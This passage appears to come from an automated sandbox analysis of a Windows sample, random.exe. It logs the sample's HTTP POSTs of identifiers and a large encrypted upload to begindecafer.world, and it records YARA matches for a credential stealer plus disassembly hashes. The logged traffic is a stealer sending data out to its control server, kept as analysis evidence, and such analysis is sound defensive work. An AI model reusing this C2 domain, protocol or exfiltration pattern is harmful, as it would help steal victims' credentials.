                                                              2025-03-07 19:07:33 UTC4600OUTData Raw: 78 d1 ef 6b 61 2b 9c c5 4b b7 fa 22 a4 20 b2 3f 73 d1 a8 1f 44 da 1c 80 4d 16 37 ec 88 2d 5b cf 2b 50 75 11 32 72 b7 34 ac 07 f4 4f 92 f6 4f 7e ff 3e 8e f4 85 a4 51 83 a0 ee 0c e7 2b ac 4b f2 2a 98 36 b7 e8 5f 4e f0 29 ed df 5f 04 bc 06 fa 56 dc d9 64 2d 8c 32 0a 6f f3 34 78 92 ad 7f b6 ba 44 64 3f ec e7 56 43 ec 2d 69 16 d8 d6 d9 74 53 f5 b8 fc ee 9f 18 fc 52 36 21 8f 66 30 a4 64 b7 59 4f e8 9a 28 6d 58 b9 bc b7 d6 fd 68 9b cb 69 c7 9e a7 e5 2f 5f 24 9c c8 9f ba 45 8b fc 4f b3 04 6c 6b 67 4f 2f 9e 10 fc fe 95 98 b3 ae 54 77 9e 01 45 3b e8 bc 59 f8 68 04 c6 27 9c 17 e1 53 56 0d f3 c3 fb 76 c2 db 6d bc 55 42 e0 ab df 31 1d d3 01 82 03 7f 55 fe cf 5f 61 8f 34 4d b0 7c 71 b8 00 70 0b a2 8a ce 78 6f 2f f5 d4 af c6 cc 5c d1 92 de 46 b9 41 35 77 2c ea cb 92 15
                                                              Data Ascii: xka+K" ?sDM7-[+Pu2r4OO~>Q+K*6_N)_Vd-2o4xDd?VC-itSR6!f0dYO(mXhi/_$EOlkgO/TwE;Yh'SVvmUB1U_a4M|qpxo/\FA5w,
                                                              2025-03-07 19:07:34 UTC821INHTTP/1.1 200 OK
                                                              Date: Fri, 07 Mar 2025 19:07:33 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8FtA2vBQQTpWAglMh49JnmgCzQ4LJRiPsZNQIlDLkwLbzzShlRYZvyK7af387P2dKlR4K%2BLBXD%2BSY8zUyztw5wVFQ5gMNHlLeOoTOGyqJY%2BrWebBF67hRClRXeyu3zYOV0gZ98%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 91cc605cd9c98843-IAD
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43417&min_rtt=34427&rtt_var=17752&sent=20&recv=23&lost=0&retrans=0&sent_bytes=2847&recv_bytes=20890&delivery_rate=84098&cwnd=103&unsent_bytes=0&cid=965a541b2f670050&ts=1222&x=0"
                                                              2025-03-07 19:07:34 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 32 34 2e 32 34 36 2e 32 33 38 2e 31 37 37 22 7d 7d 0d 0a
                                                              Data Ascii: 46{"success":{"message":"message success delivery from 24.246.238.177"}}
                                                              2025-03-07 19:07:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.649691188.114.97.34436660C:\Users\user\Desktop\random.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-07 19:07:36 UTC282OUTPOST /QwdZdf HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=3MvThmNLI8Sotn
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 2336
                                                              Host: begindecafer.world
                                                              2025-03-07 19:07:36 UTC2336OUTData Raw: 2d 2d 33 4d 76 54 68 6d 4e 4c 49 38 53 6f 74 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 0d 0a 2d 2d 33 4d 76 54 68 6d 4e 4c 49 38 53 6f 74 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4d 76 54 68 6d 4e 4c 49 38 53 6f 74 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38
                                                              Data Ascii: --3MvThmNLI8SotnContent-Disposition: form-data; name="uid"ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518--3MvThmNLI8SotnContent-Disposition: form-data; name="pid"1--3MvThmNLI8SotnContent-Disposition: form-data; name="hwid"8
                                                              2025-03-07 19:07:37 UTC272INHTTP/1.1 200 OK
                                                              Date: Fri, 07 Mar 2025 19:07:37 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: cloudflare
                                                              Vary: Accept-Encoding
                                                              Cf-Cache-Status: DYNAMIC
                                                              CF-RAY: 91cc6073d851d6ec-IAD
                                                              alt-svc: h3=":443"; ma=86400
                                                              2025-03-07 19:07:37 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 32 34 2e 32 34 36 2e 32 33 38 2e 31 37 37 22 7d 7d 0d 0a
                                                              Data Ascii: 46{"success":{"message":"message success delivery from 24.246.238.177"}}
                                                              2025-03-07 19:07:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.649692188.114.97.34436660C:\Users\user\Desktop\random.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-07 19:07:40 UTC283OUTPOST /QwdZdf HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=8o7XKa53n6evR
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 588088
                                                              Host: begindecafer.world
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: 2d 2d 38 6f 37 58 4b 61 35 33 6e 36 65 76 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 0d 0a 2d 2d 38 6f 37 58 4b 61 35 33 6e 36 65 76 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 6f 37 58 4b 61 35 33 6e 36 65 76 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 42 33
                                                              Data Ascii: --8o7XKa53n6evRContent-Disposition: form-data; name="uid"ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518--8o7XKa53n6evRContent-Disposition: form-data; name="pid"1--8o7XKa53n6evRContent-Disposition: form-data; name="hwid"8EB3
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: 42 fd 5f 6a e3 ba 8d 02 88 f2 4d 49 1e 08 06 0c b9 7d a2 c5 3f 45 9b a7 ba a3 f9 c5 8a 92 5d d7 56 96 70 3c d4 65 26 36 0c 68 dd 86 17 a9 e1 4a ad b0 f1 d1 25 e8 d7 7c d2 7b eb cb da 96 d6 26 66 04 d1 fc a0 80 21 e1 dc 3f 6d 97 86 74 34 2a c9 2b 4d 72 d6 ed a9 43 4e e8 28 6d 79 2f 55 a1 60 20 bf 7e 6b 36 1c 19 47 cd 8d 83 68 25 b4 7f 23 63 4e 85 84 ba 2e 07 77 3f 6a ee e1 65 97 39 f3 46 e7 e5 29 f0 3a a3 e4 40 4d 4f fe 19 4e 69 7b 0e ff e6 b9 88 a4 0a b5 44 1d a8 c5 27 e5 64 6a f0 e9 4f da 44 0d c9 8d 23 bb 15 de cc 10 e1 de ec d5 2e a0 30 e6 d3 4e f9 59 03 68 0d 0e f9 13 02 94 c5 7b 57 c5 35 72 cd 07 e0 c6 55 c5 b3 8b ab 17 71 5a 8e 48 af 28 2a 82 92 ed a1 5c ba b5 a6 59 fc 67 d7 f0 e0 66 72 d5 d8 d0 5e 14 0d 41 2e 38 ca 54 d7 f7 29 44 e2 6b ae d2 30 9a
                                                              Data Ascii: B_jMI}?E]Vp<e&6hJ%|{&f!?mt4*+MrCN(my/U` ~k6Gh%#cN.w?je9F):@MONi{D'djOD#.0NYh{W5rUqZH(*\Ygfr^A.8T)Dk0
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: f4 8b 14 54 1b 44 ca 6d ab d5 22 ed 31 fe 1f cc e1 f8 d6 fa bd f2 5b 5e f4 99 b6 05 3f 43 dd bb ef e1 2b 02 87 44 0c 6a 5f 82 6a a4 a1 f4 f8 b2 25 d2 8f ee 2c 66 c3 70 df 16 2b 92 9d ec 9f c3 8d 09 be bd 4f fc f5 50 d4 36 2c 82 28 60 20 b3 f5 7b 9f b4 d2 91 07 9a 4e da af 54 6a 2d e9 d6 57 37 b4 11 f6 6a 59 1d 44 b3 da d5 12 b1 f6 9d 34 05 52 e4 85 84 21 e2 73 9e 9c ba f4 22 3b 1b 20 ec 5e ab 45 fa 9a cb ed aa 1b 55 8d 51 04 b6 7b c2 36 71 e8 b4 0e 95 46 b9 98 3f 67 f1 6f 83 91 6b d9 0c 3b c3 f8 24 f9 99 47 ba 8d 0a c1 43 d2 7f 9c 65 28 e4 70 f2 cb 87 16 87 31 7e 87 a5 12 e2 82 fd a6 2b 31 b3 a7 37 08 a1 1e a9 4c 87 05 86 0e 62 fc c3 fc 8e 2b 91 7d 62 28 7d 6d eb 0f c0 cd 01 6c f2 24 67 1a c8 81 71 96 af b0 28 2f a6 62 cc 20 a4 49 6f 1c 41 d9 7f ed ab ba
                                                              Data Ascii: TDm"1[^?C+Dj_j%,fp+OP6,(` {NTj-W7jYD4R!s"; ^EUQ{6qF?gok;$GCe(p1~+17Lb+}b(}ml$gq(/b IoA
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: ce f3 fd 6f e7 3b b2 d7 90 52 59 69 e8 0b 05 26 d7 06 51 bb 35 f9 c9 f0 63 1d 63 e3 a9 9d ff 4e 16 7d d6 c7 5e 1b 8e 07 ad 98 cd 4c 7b a6 53 82 c9 13 08 f2 3e 8c 5b a5 95 8e 20 3b 2c e5 1b ea 52 a6 5d ce 46 16 fe f2 d8 e9 74 da b8 bc 66 fa de a7 18 af 33 78 69 18 c3 1d bc c6 61 70 c0 b1 98 ef 76 d0 2c ea 43 d3 f3 18 7e 44 ed 0c 98 58 75 3c cc b8 ec 90 60 4e 91 da 10 db 7f 65 04 cc f8 ce 1b 66 c2 41 c3 b5 e5 83 0c 36 60 83 67 ba a3 b9 a2 b1 fd 1e 61 cc ee c9 43 3d 45 d9 0a 1b 0f 37 a3 b3 32 20 99 13 4c ac f9 9a f1 9d 81 60 78 be b3 f4 61 5d e7 0f e6 fa e2 63 05 16 42 06 9f db 8f 3e 2b 98 43 a6 90 f6 7f 86 0f 4b 43 aa a0 5e 7c d2 a4 0e 1c f8 20 6c 30 c6 14 52 f9 b0 0f e6 5d 64 c2 cb 6e 39 01 57 9c da 2d 8a a9 aa bc 8f 28 e0 25 ed c7 06 78 aa 43 c2 0c 9c 2c
                                                              Data Ascii: o;RYi&Q5ccN}^L{S>[ ;,R]Ftf3xiapv,C~DXu<`NefA6`gaC=E72 L`xa]cB>+CKC^| l0R]dn9W-(%xC,
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: 7e ee 5f 82 69 ce 1b ea b0 96 4f a5 94 86 e9 5a b2 e6 64 81 f3 35 83 d4 20 46 2d 1c 7b ef ee f1 f1 d6 af 41 9f 90 57 d1 ea 58 6f be ae 82 a1 e5 57 58 50 bb 72 81 a0 fb 71 23 be 15 b7 df 12 5c 1a 6f a2 35 34 05 1f dc 03 31 b7 c6 49 c1 84 09 71 c6 09 55 80 55 4d 79 69 85 0b 09 a5 ec 79 60 7d 1b db 81 2e 4d f3 f8 d3 bf f3 55 bd 0f 7b 12 e8 4c 04 2a db 58 e0 fc 01 f9 47 32 9b 6f 97 ac 17 7d 0d 82 30 1b 18 2b 15 9a 58 95 93 24 ca 23 17 4b 88 0c c1 dc 61 51 5d c9 39 1a 1f f8 39 20 37 6c a0 7e 2b 42 15 d8 06 ee 07 ee 02 83 ad 48 87 d3 aa 60 e3 2b 0e f7 11 ab e8 fd f6 c0 8a 91 2b b7 29 54 e0 89 58 1b 3a 30 07 47 7c d3 92 28 38 45 47 56 4b ee 78 33 08 34 30 f1 fd be 14 f6 ac ab 9f f0 64 3c 9d d7 92 09 5c d2 03 b2 04 b2 a3 85 e6 cb 35 f7 ca a3 ff e5 75 a2 45 c8 ac
                                                              Data Ascii: ~_iOZd5 F-{AWXoWXPrq#\o541IqUUMyiy`}.MU{L*XG2o}0+X$#KaQ]99 7l~+BH`++)TX:0G|(8EGVKx340d<\5uE
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: 6c c9 6d 55 83 75 49 56 cb eb 2d 36 dc ae 62 d5 ef f1 07 44 9e d0 e0 9d 7d 32 23 2c a4 8d c8 e1 e8 00 0b 24 60 3e 17 10 0e f2 23 42 2c de 10 6d 05 f3 cc 7c 56 cb df fe 26 d3 e7 e3 4c ea 9e 2e 4c 28 8a de 2c 65 34 8a 02 c1 87 e2 df fc 91 fd 14 39 c6 ad 28 91 1e 43 56 f3 21 84 20 42 19 78 d1 49 81 ca ca c7 4c 6c 5a 6b e8 57 1d 4a 06 71 5c 76 ac 3b f9 31 85 4a 10 0e 4e db 8c 5f 03 11 7f a3 e1 06 46 44 da 42 a9 f4 76 32 29 25 ca d9 61 47 09 a7 f4 b9 23 b4 f3 3f ea 9c 90 59 57 17 a6 9f 3f 5c 1b 16 47 e4 b7 c9 45 08 f2 b8 d9 e6 b2 88 43 4c 49 7d b1 6f fa 71 54 ff 9d 73 69 04 cb 79 31 25 fa f9 91 3c c3 2b ac 1a 3d 73 cc 57 f0 1b 42 d2 83 ba af fa ee 2b 67 a3 80 fb 61 69 65 73 9e fb 60 5a e1 2d b0 2c 90 55 91 99 86 d5 34 63 cf b3 b0 db 53 16 8e d8 91 91 ad 3b 0d
                                                              Data Ascii: lmUuIV-6bD}2#,$`>#B,m|V&L.L(,e49(CV! BxILlZkWJq\v;1JN_FDBv2)%aG#?YW?\GECLI}oqTsiy1%<+=sWB+gaies`Z-,U4cS;
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: a6 36 89 7a 36 8e 19 a7 32 a1 7f a0 2a e8 31 15 ed f5 6c 8d af 80 80 b3 32 e5 69 01 e0 f7 09 cf 79 ae eb 43 19 12 f6 88 ac 2f 35 bd 27 18 34 f4 5b c6 33 e0 37 9c 99 5f a7 86 77 e7 31 3b 39 34 15 55 22 d6 87 28 03 db dd cd d3 18 d0 38 16 b3 c1 0d a4 b9 68 92 63 c8 f6 74 69 1c 9d a4 c2 c4 01 f6 9e e2 c0 25 81 ed 65 c4 58 28 e3 73 dc a5 70 a7 f8 46 2e d3 53 dd fd fd ab 8d 5e e9 1e 67 9e af e1 13 36 9c 82 87 79 85 8a bd 66 cb ac 88 90 f1 38 0b ce 6a 65 72 8c fc 76 16 d7 c3 80 ce c7 0a ab 56 de 91 9d b5 3b b6 b3 29 5a 0c cb 31 22 51 30 e7 5c 6f 4c f0 d9 89 2a 43 c2 e1 fa bc 53 10 2a dc e8 10 75 67 46 3e 89 92 be 79 d5 92 a0 96 5d c1 00 84 21 bf 0e cd 04 d6 0e d6 e6 83 9f a2 b1 9f 36 a1 ff 45 aa e3 7f 72 7b c0 e8 d5 46 98 0d bd 91 9b ac 1c 35 81 4a fa c9 9b 0a
                                                              Data Ascii: 6z62*1l2iyC/5'4[37_w1;94U"(8hcti%eX(spF.S^g6yf8jervV;)Z1"Q0\oL*CS*ugF>y]!6Er{F5J
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: 6e 19 a6 2d d6 f4 6c 22 14 7b 42 d9 08 b2 b5 79 28 2f ab 6b 87 4d 17 03 18 4d 40 35 d8 42 c6 e3 9c e0 31 99 b9 60 a3 6a 13 22 dd a4 b5 1b 85 9f 40 85 89 d0 68 10 e4 2e ef f2 a6 eb 74 ab 71 26 18 38 0d 33 06 b9 2a 71 e3 b7 9e d4 34 46 a4 ba eb 7d f9 7d ba 68 1a 46 e9 cd 45 1e 56 cc 71 f4 69 3b 65 80 48 3a 5c 2c 65 0f 56 6f 06 22 04 93 93 91 13 e1 d0 ce 01 2b 5a 8c 78 04 cd 78 5f 3e 38 e7 df 2c 20 9e c5 f6 16 7c 57 25 a6 a7 de 59 0e 42 06 98 4a f9 fe 8d 3e 79 83 28 23 25 eb 09 cf 7b 0a 62 13 72 fc 9c 56 c6 1f 48 03 25 b7 7b 17 d3 0a 0d 60 bf 9d 1d 04 d1 2b b8 57 ab ec 71 63 cd 81 2e ed 48 a6 7e 6a fc f2 9b 94 0c 3f 8c f8 28 69 84 ee a4 88 31 be cc 34 1f e7 9b 02 d5 76 06 4f ef 98 f4 0b 48 72 c3 2f 51 4b 36 38 f7 53 0e 50 45 45 e0 e1 30 96 b8 89 83 b8 e2 a9
                                                              Data Ascii: n-l"{By(/kMM@5B1`j"@h.tq&83*q4F}}hFEVqi;eH:\,eVo"+Zxx_>8, |W%YBJ>y(#%{brVH%{`+Wqc.H~j?(i14vOHr/QK68SPEE0
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: 9f 0f f3 aa 1b c7 af c8 dc e3 e0 3b ff 0c c2 83 c7 a3 45 2e 1f 62 6e c4 3d d6 e3 df 5a aa fe cd da 51 10 3a c8 ef b9 0d b1 16 03 99 57 27 92 92 f3 c0 a5 fa 50 43 73 20 69 3a cd e3 f2 14 c6 36 c2 08 38 25 4d d7 53 86 08 af ed c4 f9 2e 46 38 e1 3e 59 77 67 84 00 9f 9b 12 2d b0 dd 3e e7 34 b2 e4 af cd b6 53 11 44 27 cb 1f 68 0f 67 96 1e 83 61 8e 50 22 fb d3 f6 3c 95 91 8f 07 6b 36 28 d9 33 ae 8a 2c 31 87 eb 3b 11 d4 8f 25 90 ee 12 6d d8 de f6 eb 3e 12 9b 35 41 59 80 65 d6 ad 04 55 a8 f2 a7 d4 7b b2 73 b9 ca 5a 37 16 dc ff 9b 45 42 6c 6b 5e 5e 81 37 b5 42 32 19 71 60 e2 44 29 82 d7 cd a6 c1 89 00 b4 0e 4c 05 1e 57 ef e9 aa 4d 35 f8 35 70 a9 89 ab 9f b7 c2 c8 10 59 6d b9 96 c3 4b c2 6b a7 18 60 97 b4 08 21 be 94 c5 c9 5f 41 12 16 1e be 9b 31 63 df 30 c0 bc 6b
                                                              Data Ascii: ;E.bn=ZQ:W'PCs i:68%MS.F8>Ywg->4SD'hgaP"<k6(3,1;%m>5AYeU{sZ7EBlk^^7B2q`D)LWM55pYmKk`!_A1c0k
                                                              2025-03-07 19:07:40 UTC15331OUTData Raw: 2f 9a 87 f5 ae eb ff ba d9 38 38 dd 1f 0b 3b 63 23 83 09 65 5f d7 26 96 88 bc fe 3d 5b 13 00 84 af 22 3d e0 c3 12 27 fa 51 1a b9 06 77 33 c0 2d c6 54 4f b5 33 8f a4 f6 f3 e6 b2 81 3c dd fe 1e ee 26 fd 5e b4 4e 0b a8 34 fa b8 13 f7 f5 1f a6 05 14 58 85 1e b2 64 f1 83 57 5b 6a dc b9 b4 eb 69 30 04 26 54 ea 7b 99 2e 22 55 5b 56 56 cf e3 f2 67 62 2a 4f f2 2d 24 89 d8 81 44 e2 c1 1b 09 64 28 73 fb dd b6 51 76 54 7e f3 28 5b 8c d1 7d 81 e8 e8 1a 35 66 33 2d 3f f7 fc 8e 7e b2 23 88 40 73 69 a0 1a 8e 2d 2d f6 af 70 c5 52 dc ed 68 a4 92 26 38 ca 65 46 71 d0 de b2 89 5a ff 5c 7e e9 97 08 d3 62 4e 76 77 ae 31 a0 71 ed 1e 22 04 97 e6 3e 28 ef f9 d5 fa 3a dc 10 9f a5 f9 8d 22 e0 e7 f9 4c 2e b9 74 4c 1d b9 98 f2 91 ef 21 16 cc 4d 9f 92 81 3f ff 9c a0 fe 27 f7 33 34 b3
                                                              Data Ascii: /88;c#e_&=["='Qw3-TO3<&^N4XdW[ji0&T{."U[VVgb*O-$Dd(sQvT~([}5f3-?~#@si--pRh&8eFqZ\~bNvw1q">(:"L.tL!M?'34
                                                              2025-03-07 19:07:42 UTC826INHTTP/1.1 200 OK
                                                              Date: Fri, 07 Mar 2025 19:07:42 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DaduyV0AP6f%2Bh2%2B0ZLeVxdSVTg%2BMzMwYIB9vxlS0d9XTbq1T5vYr6M21oFEPcuequMx0PonVMx7yT7J1BkJiYjFP%2B1UKYFtgS7I9FlkSVIz1lH8bTZlNhx3tJARwLT6pVA4xIE%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 91cc60888bb3fa2f-IAD
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43425&min_rtt=40929&rtt_var=20340&sent=276&recv=443&lost=0&retrans=0&sent_bytes=2845&recv_bytes=590679&delivery_rate=47554&cwnd=117&unsent_bytes=0&cid=553c74e9d30cc21f&ts=2685&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.649693188.114.97.34436660C:\Users\user\Desktop\random.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-07 19:07:45 UTC270OUTPOST /QwdZdf HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 103
                                                              Host: begindecafer.world
                                                              2025-03-07 19:07:45 UTC103OUTData Raw: 75 69 64 3d 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 26 63 69 64 3d 26 68 77 69 64 3d 38 45 42 33 32 44 43 43 36 33 42 34 41 42 43 42 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34
                                                              Data Ascii: uid=ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518&cid=&hwid=8EB32DCC63B4ABCBE3EDCEA778368E34
                                                              2025-03-07 19:07:46 UTC800INHTTP/1.1 200 OK
                                                              Date: Fri, 07 Mar 2025 19:07:46 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 43
                                                              Connection: close
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B3bR9RlMqXjlyJHDCe%2Fo0H9bHPWfPMc58YEyh%2F8%2FsS%2Bj9KmnIcYjYZ1msLsA1ApMPoVj8pebHsl8letW8ZYh%2B8iF9szM6rnRs32ra%2F9GcxRSqxx%2FEBB8k88Cq6nysL4MUhJa%2Fj4%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 91cc60ad8cd16905-IAD
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=32927&min_rtt=26991&rtt_var=14361&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1009&delivery_rate=107295&cwnd=215&unsent_bytes=0&cid=502e5157b43ec3e5&ts=1889&x=0"
                                                              2025-03-07 19:07:46 UTC43INData Raw: 0a de 46 db 23 79 e0 3e 37 43 00 d7 a3 a0 eb 93 a3 b6 99 f8 47 70 ef e3 51 51 a6 82 f7 b0 d8 32 62 96 31 d8 bd 98 b9 e6 32 d9 1d
                                                              Data Ascii: F#y>7CGpQQ2b12


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:14:07:19
                                                              Start date:07/03/2025
                                                              Path:C:\Users\user\Desktop\random.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\random.exe"
                                                              Imagebase:0xbd0000
                                                              File size:3'056'640 bytes
                                                              MD5 hash:7EF195119136BBD7338323363639B91B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1408039959.0000000000691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1378752783.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1378704518.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1378752783.0000000000691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Non-executed Functions

                                                                Function 006CD4FB Relevance: .3, Instructions: 278COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.1462407076.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C1000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_6c1000_random.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 330a5a5fd859e882990d3d701dab45bcc8b856206a03709425bcb6c79e56e100
                                                                • Instruction ID: 2f3bfee43283bad6ad7505770e5b12caa7378c19c77450310713788cf6ea5556
                                                                • Opcode Fuzzy Hash: 330a5a5fd859e882990d3d701dab45bcc8b856206a03709425bcb6c79e56e100
                                                                • Instruction Fuzzy Hash: 63C1916960E7C18FE70787304D65A60BF72AE53148B4F82DBC4C4DF5A3D699582CC3A2